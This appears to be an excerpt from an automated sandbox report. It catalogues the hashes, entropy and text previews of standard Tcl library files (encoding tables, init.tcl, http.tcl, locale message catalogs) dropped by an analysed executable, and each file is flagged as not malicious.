SHA-256:	68F22BAD30DAA81B215925416C1CC83360B3BB87EFC342058929731AC678FF37
SHA-512:	E87105F7A5A983ACEAC55E93FA802C985B2B19F51CB3C222B4C13DDCF17C32D08DF323C829FB4CA33770B668485B7D14B7F6B0CF2287B0D76091DE2A675E88BD
Malicious:	false
Preview:	# Encoding file: macRoman, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8.221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02.202100B7201A201E203000C200CA00C100CB0

C:\Users\user\Desktop\tcl\encoding\macRomania.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	3.342586490827578
Encrypted:	false
SSDEEP:	24:8tTUmJvRju3ShVbsZiAMiZyb7P4SNMVZSxOZFYRMdj/TAg4JysAWD:8tgmOEVIwAMiw/P3AtYRMFTABEszD
MD5:	C9AD5E42DA1D2C872223A14CC76F1D2B
SHA1:	E257BD16EF34FDC29D5B6C985A1B45801937354C
SHA-256:	71AE80ADFB437B7BC88F3C76FD37074449B3526E7AA5776D2B9FD5A43C066FA8
SHA-512:	74588523D35A562AD4B1AF2B570596194D8C5018D5B44C8BA2B1F6BAD422D06E90172B0E65BB975663F3A3C246BCF2F598E9778BA86D1C5A51F5C0A38A2670EC
Malicious:	false
Preview:	# Encoding file: macRomania, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E.221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163.202100B7201A201E203000C200CA00C100C

C:\Users\user\Desktop\tcl\encoding\macThai.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1092
Entropy (8bit):	3.539905812302991
Encrypted:	false
SSDEEP:	24:88TUmJvRju3ShVbsZiAMiZyb7P4oJi8XPHmED43U/Tmh:88gmOEVIwAMiw/PNJpP43U0
MD5:	163729C7C2B1F5A5DE1FB7866C93B102
SHA1:	633D190B5E281CFC0178F6C11DD721C6A266F643
SHA-256:	CEAD5EB2B0B44EF4003FBCB2E49CA0503992BA1D6540D11ACBBB84FDBBD6E79A
SHA-512:	2093E3B59622E61F29276886911FAA50BA3AA9D903CAF8CB778A1D3FDB3D1F7DA43071AFC3672C27BE175E7EEBBC542B655A85533F41EA39F32E80663CAF3B44
Malicious:	false
Preview:	# Encoding file: macThai, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899.FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD.00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F.0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F.0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F.0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F.0E400E410E420E430E440E450E460E470E480E

C:\Users\user\Desktop\tcl\encoding\macTurkish.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	3.353168947106635
Encrypted:	false
SSDEEP:	24:8QjTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdD/g4JysD:88gmOEVIwAMiw/P32YRM9BEsD
MD5:	F20CBBE1FF9289AC4CBAFA136A9D3FF1
SHA1:	382E34824AD8B79EF0C98FD516750649FD94B20A
SHA-256:	F703B7F74CC6F5FAA959F51C757C94623677E27013BCAE23BEFBA01A392646D9
SHA-512:	23733B711614EA99D954E92C6035DAC1237866107FE11CDD5B0CD2A780F22B9B7B879570DB38C6B9195F54DAD9DFB0D60641AB37DFF3C51CF1A11D1D36471B2D
Malicious:	false
Preview:	# Encoding file: macTurkish, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8.221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F.202100B7201A201E203000C200CA00C100C

C:\Users\user\Desktop\tcl\encoding\macUkraine.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	3.3460856516901947
Encrypted:	false
SSDEEP:	24:8TzTUmJvRju3ShVbsZiAMiZyb7P4GE+SAJlM9aDpiR/Pk956e3cmq:8PgmOEVIwAMiw/Pr5NY3k9nsmq
MD5:	92716A59D631BA3A352DE0872A5CF351
SHA1:	A487946CB2EFD75FD748503D75E495720B53E5BC
SHA-256:	4C94E7FBE183379805056D960AB624D78879E43278262E4D6B98AB78E5FEFEA8
SHA-512:	863A667B6404ED02FE994089320EB0ECC34DC431D591D661277FB54A2055334DBEBCAAE1CA06FB8D190727EBA23A47B47991323BE35E74C182F83E5DEAA0D83B
Malicious:	false
Preview:	# Encoding file: macUkraine, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0410041104120413041404150416041704180419041A041B041C041D041E041F.0420042104220423042404250426042704280429042A042B042C042D042E042F.202000B0049000A300A7202200B6040600AE00A9212204020452226004030453.221E00B122642265045600B504910408040404540407045704090459040A045A.0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455.20132014201C201D2018201900F7201E040E045E040F045F211604010451044F.04300431043204330434043504360437043

C:\Users\user\Desktop\tcl\encoding\shiftjis.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	41862
Entropy (8bit):	3.4936148161949747
Encrypted:	false
SSDEEP:	768:/huW1PJnT9TOZRaQiPCLUKr7KBi9FrOLdtY:/ZPV9KoqTxFGXY
MD5:	8FBCB1BBC4B59D6854A8FCBF25853E0D
SHA1:	2D56965B24125D999D1020C7C347B813A972647C
SHA-256:	7502587D52E7810228F2ECB45AC4319EA0F5C008B7AC91053B920010DC6DDF94
SHA-512:	128E66F384F9EA8F3E7FBEAD0D3AA1D45570EB3669172269A89AE3B522ED44E4572C6A5C9281B7E219579041D14FF0E76777A36E3902BFA1B58DC3DA729FA075
Malicious:	false
Preview:	# Encoding file: shiftjis, multi-byte.M.003F 0 40.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080000000000000000000850086008700000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.0000000000000000000000000000000000000

C:\Users\user\Desktop\tcl\encoding\symbol.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1091
Entropy (8bit):	3.675943323650254
Encrypted:	false
SSDEEP:	24:Sd0UmJvRjuLoVoMQVoRmSdsTAsSnP9Us+yw4VivXObCXv:afmOEVoMQVoRmosTHSP9U/ydmXwCXv
MD5:	1B612907F31C11858983AF8C009976D6
SHA1:	F0C014B6D67FC0DC1D1BBC5F052F0C8B1C63D8BF
SHA-256:	73FD2B5E14309D8C036D334F137B9EDF1F7B32DBD45491CF93184818582D0671
SHA-512:	82D4A8F9C63F50E5D77DAD979D3A59729CD2A504E7159AE3A908B7D66DC02090DABD79B6A6DC7B998C32C383F804AACABC564A5617085E02204ADF0B13B13E5B
Malicious:	false
Preview:	# Encoding file: symbol, single-byte.S.003F 1 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002122000023220300250026220D002800292217002B002C2212002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.22450391039203A70394039503A603930397039903D1039A039B039C039D039F.03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F.F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF.03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.000003D2203222642044221E0192266326662665266021942190219121922193.00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5.21352111211C21182297229522052229222A2283228722842282228622082209.2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3.22C42329F8E8F8E9F8EA2211F8EBF8ECF8EDF8E

C:\Users\user\Desktop\tcl\encoding\tis-620.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1091
Entropy (8bit):	2.9763240350841884
Encrypted:	false
SSDEEP:	24:ZlTUmJvRju3ShVbsZiAMiZyb7PNHmED43U/TW5dF:PgmOEVIwAMiw/PJ43UKF
MD5:	7273E998972C9EFB2CEB2D5CD553DE49
SHA1:	4AA47E6DF964366FA3C29A0313C0DAE0FA63A78F
SHA-256:	330517F72738834ECBF4B6FA579F725B4B33AD9F4669975E727B40DF185751FF
SHA-512:	56BF15C123083D3F04FE0C506EE8ECE4C08C17754F0CAAD3566F1469728CFD2F0A487023DCB26432240EB09F064944D3EF08175979F5D1D2BF734E7C7C609055
Malicious:	false
Preview:	# Encoding file: tis-620, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E0000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F.0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F.0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F.0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F.0E400E410E420E430E440E450E460E470E480E

C:\Users\user\Desktop\tcl\history.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8965
Entropy (8bit):	4.797372265665968
Encrypted:	false
SSDEEP:	192:D/LSKxptMOtJt+tztUtputBtKtPpkyCqXLo9f6Jy3MN6QNiLtHQYTba3QYQYxlWl:DFxptHXQ9K7u7MZnCYq
MD5:	2C3BBE593E10F8B25A1AE7753AC60C3A
SHA1:	4D5A635C327FA29E9DDF9E6A2A44081C8DB8AA5A
SHA-256:	F136E0DB9E71468E4D9D93200CD2D04E6915D5546681BFECA6CB9A620BA648BA
SHA-512:	82B83610D273FAF980FF7BEEDD5BEE5C17FFED11A5F9B146135764ED2B86D57B98D3AEC50D2C9E7C72DA7C8CBC0329A712828D2ACEC27CC6C461924942C9B859
Malicious:	false
Preview:	# history.tcl --.#.# Implementation of the history command..#.# Copyright (c) 1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# The tcl::history array holds the history list and.# some additional bookkeeping variables..#.# nextid.the index used for the next history list item..# keep..the max size of the history list.# oldest.the index of the oldest item in the history...namespace eval tcl {. variable history. if {![info exists history]} {..array set history {.. nextid.0.. keep.20.. oldest.-20..}. }.}..# history --.#.#.This is the main history command. See the man page for its interface..#.This does argument checking and calls helper procedures in the.#.history namespace...proc history {args} {. set len [llength $args]. if {$len == 0} {..return [tcl::HistInfo]. }. set key [lindex $args 0]. set options "add, change, clear, event, info, keep

C:\Users\user\Desktop\tcl\http1.0\http.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9693
Entropy (8bit):	4.753694945075162
Encrypted:	false
SSDEEP:	192:kQkH8VqqNg5PPx7GRpoMJesrCL2coOG0vARQVSDR6VrKj7vWQYQ7r1QvLbDPv:pVqeglpu6toO3ACUpGv
MD5:	36AB75BA723A2EEE692A2C518DAAA739
SHA1:	1FB133F5E012F36BFBAAFD836E9F689FB82FFAC3
SHA-256:	88220B059956D3F331B29C514F0D4AD77FBD840EFB27F0C2621510800A9B9094
SHA-512:	24087FCD75C51280722AE64564F28934101F99F568CB5230D91517643D43DAC16E0462DE5FC967BF8CC0CC71708D6C47B9D9986FB21964D0B1EA6016E4C10D23
Malicious:	false
Preview:	# http.tcl.# Client-side HTTP for GET, POST, and HEAD commands..# These routines can be used in untrusted code that uses the Safesock.# security policy..# These procedures use a callback interface to avoid using vwait,.# which is not defined in the safe base..#.# See the http.n man page for documentation..package provide http 1.0..array set http {. -accept /. -proxyhost {}. -proxyport {}. -useragent {Tcl http client package 1.0}. -proxyfilter httpProxyRequired.}.proc http_config {args} {. global http. set options [lsort [array names http -*]]. set usage [join $options ", "]. if {[llength $args] == 0} {..set result {}..foreach name $options {.. lappend result $name $http($name)..}..return $result. }. regsub -all -- - $options {} options. set pat ^-([join $options \|])$. if {[llength $args] == 1} {..set flag [lindex $args 0]..if {[regexp -- $pat $flag]} {.. return $http($flag)..} else {.. return -code error "Unknown option $flag, must be:

C:\Users\user\Desktop\tcl\http1.0\pkgIndex.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	735
Entropy (8bit):	4.669068874824871
Encrypted:	false
SSDEEP:	12:jHxxYRs+opS42wyGlTajUA43KXks4L57+HkuRz20JSv6C3l5kl:bbYRshS42wyGlTah9XkbL5i1z2jxXkl
MD5:	10EC7CD64CA949099C818646B6FAE31C
SHA1:	6001A58A0701DFF225E2510A4AAEE6489A537657
SHA-256:	420C4B3088C9DACD21BC348011CAC61D7CB283B9BEE78AE72EED764AB094651C
SHA-512:	34A0ACB689E430ED2903D8A903D531A3D734CB37733EF13C5D243CB9F59C020A3856AAD98726E10AD7F4D67619A3AF1018F6C3E53A6E073E39BD31D088EFD4AF
Malicious:	false
Preview:	# Tcl package index file, version 1.0.# This file is generated by the "pkg_mkIndex" command.# and sourced either when an application starts up or.# by a "package unknown" script. It invokes the.# "package ifneeded" command to set up package-related.# information so that packages will be loaded automatically.# in response to "package require" commands. When this.# script is sourced, the variable $dir must contain the.# full path name of this file's directory...package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}].

C:\Users\user\Desktop\tcl\init.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25030
Entropy (8bit):	4.822787031433717
Encrypted:	false
SSDEEP:	768:iODHzX4ISabmvmdquRMGFb/9IrOBWqQYjMQ7p12HaYF07:BDb4ISGmvsF/9IrO2YjrMaZ7
MD5:	43F567A868B35C354733F745BD9288C9
SHA1:	E3293E52EAFFF64D169FE46BF2E6D2A65AEBD820
SHA-256:	EF07D9D497172ADF71A3FD3EF4FBAFD9654AEAB54DADBFD338585C557EA22A31
SHA-512:	26955F449006625961974AC35BCCB52A42CA6EC27694D04789E6A9AA251460B4869B7C109B89C20E154D42ED9DF9C2F25F4958C087184796272108D22F28ED57
Malicious:	false
Preview:	# init.tcl --.#.# Default system startup file for Tcl-based applications. Defines.# "unknown" procedure and auto-load facilities..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 1998-1999 Scriptics Corporation..# Copyright (c) 2004 by Kevin B. Kenny. All rights reserved..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# This test intentionally written in pre-7.5 Tcl .if {[info commands package] == ""} {. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]".}.package require -exact Tcl 8.5.15..# Compute the auto path to use in this interpreter..# The values on the path come from several locations:.#.# The environment variable TCLLIBPATH.#.# tcl_library, which is the directory containing this init.tcl script..# [tclInit] (Tcl_Init()) s

C:\Users\user\Desktop\tcl\msgs\af.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	989
Entropy (8bit):	4.015702624322247
Encrypted:	false
SSDEEP:	12:4EnLzu8wcm2NkKcmtH3WhvdfjESBToOqepFHvFgdF69dixmem1OMVjeza6O6c:4azu8DtkN3bbJ75pF9gG3U2e+gc
MD5:	3A3B4D3B137E7270105DC7B359A2E5C2
SHA1:	2089B3948F11EF8CE4BD3D57167715ADE65875E9
SHA-256:	2981965BD23A93A09EB5B4A334ACB15D00645D645C596A5ECADB88BFA0B6A908
SHA-512:	044602E7228D2CB3D0A260ADFD0D3A1F7CAB7EFE5DD00C7519EAF00A395A48A46EEFDB3DE81902D420D009B137030BC98FF32AD97E9C3713F0990FE6C09887A2
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \. "So"\. "Ma"\. "Di"\. "Wo"\. "Do"\. "Vr"\. "Sa"]. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \. "Sondag"\. "Maandag"\. "Dinsdag"\. "Woensdag"\. "Donderdag"\. "Vrydag"\. "Saterdag"]. ::msgcat::mcset af MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset af MONTHS_FULL [list \. "Januarie"\. "Februarie"\. "Maart"\. "April"\. "Mei"\. "Junie"\. "Julie"\. "Augustus"\. "September"\. "Oktober"\. "November"\. "Desember"\. ""]. ::msgcat::mcset af AM "VM". ::msgcat::mcset af PM "NM".}.

C:\Users\user\Desktop\tcl\msgs\af_za.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	251
Entropy (8bit):	4.879621059534584
Encrypted:	false
SSDEEP:	6:SlSyEtJLlpuoo6dmouFygvNLouFqF3v6aZouFy9+3vR6HK:4EnLzu8YAgvNTYF3v6axAI3voq
MD5:	27C356DF1BED4B22DFA55835115BE082
SHA1:	677394DF81CDBAF3D3E735F4977153BB5C81B1A6
SHA-256:	3C2F5F631ED3603EF0D5BCB31C51B2353C5C27839C806A036F3B7007AF7F3DE8
SHA-512:	EE88348C103382F91F684A09F594177119960F87E58C5E4FC718C698AD436E332B74B8ED18DF8563F736515A3A6442C608EBCBE6D1BD13B3E3664E1AA3851076
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y". ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.

C:\Users\user\Desktop\tcl\msgs\ar.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1964
Entropy (8bit):	4.417722751563065
Encrypted:	false
SSDEEP:	24:4azu8fnkFewadQxvbkMPm/FiUoAwonC9UFsvSnvMq:46dw/L+C9cKSvF
MD5:	0A88A6BFF15A6DABAAE48A78D01CFAF1
SHA1:	90834BCBDA9B9317B92786EC89E20DCF1F2DBD22
SHA-256:	BF984EC7CF619E700FE7E00381FF58ABE9BD2F4B3DD622EB2EDACCC5E6681050
SHA-512:	85CB96321BB6FB3119D69540B9E76916F0C5F534BA01382E73F8F9A0EE67A7F1BFC39947335688F2C8F3DB9B51D969D8EA7C7104A035C0E949E8E009D4656288
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \. "\u062d"\. "\u0646"\. "\u062b"\. "\u0631"\. "\u062e"\. "\u062c"\. "\u0633"]. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar MONTHS_ABBREV [list \. "\u064a\u0646\u0627"\. "\u0641\u0628\u0631"\. "\u0645\u0627\u0631"\. "\u0623\u0628\u0631"\. "\u0645\u0627\u064a"\. "\u064a\u0648\u0646"\. "\u064a\u0648\u0644"\. "\u0623\u063a\u0633"\. "\u0633\u0628\u062a"\. "\u0623\u0643\u062a"\

C:\Users\user\Desktop\tcl\msgs\ar_in.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	259
Entropy (8bit):	4.825452591398057
Encrypted:	false
SSDEEP:	6:SlSyEtJLlpuoo6dmoKNvf/NLoKU3v6xH5oKNo+3vfXM6PYv:4EnLzu8yvf/Nq3v6vF3vfc6q
MD5:	EEB42BA91CC7EF4F89A8C1831ABE7B03
SHA1:	74D12B4CBCDF63FDF00E589D8A604A5C52C393EF
SHA-256:	29A70EAC43B1F3AA189D8AE4D92658E07783965BAE417FB66EE5F69CFCB564F3
SHA-512:	6CCB2F62986CE1CF3CE78538041A0E4AAF717496F965D73014A13E9B05093EB43185C3C14212DC052562F3F369AB6985485C8C93D1DFC60CF9B8DABEA7CDF434
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y". ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z". ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z".}.

C:\Users\user\Desktop\tcl\msgs\ar_jo.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1812
Entropy (8bit):	4.023830561129656
Encrypted:	false
SSDEEP:	24:4azu8J5Fe6k+wR+9Gb+Oa+UcP+wR+9Gb+Oa+UD:46I6CNbtdNbQ
MD5:	4338BD4F064A6CDC5BFED2D90B55D4E8
SHA1:	709717BB1F62A71E94D61056A70660C6A03B48AE
SHA-256:	78116E7E706C7D1E3E7446094709819FB39A50C2A2302F92D6A498E06ED4A31B
SHA-512:	C63A535AD19CBEF5EFC33AC5A453B1C503A59C6CE71A4CABF8083BC516DF0F3F14D3D4F309D33EDF2EC5E79DB00ED1F7D56FD21068F09F178BB2B191603BAC25
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\

C:\Users\user\Desktop\tcl\msgs\ar_lb.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1812
Entropy (8bit):	4.020656526954981
Encrypted:	false
SSDEEP:	24:4azu865Fehk+wR+9Gb+Oa+UXP+wR+9Gb+Oa+UD:46nhCNbadNbQ
MD5:	3789E03CF926D4F12AFD30FC7229B78D
SHA1:	AEF38AAB736E5434295C72C14F38033AAFE6EF15
SHA-256:	7C970EFEB55C53758143DF42CC452A3632F805487CA69DB57E37C1F478A7571B
SHA-512:	C9172600703337EDB2E36D7470A3AED96CCC763D7163067CB19E7B097BB7877522758C3109E31D5D72F486DD50BF510DDBA50EDD248B899FA0A2EEF09FCBF903
Malicious:	false
Preview:	# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. 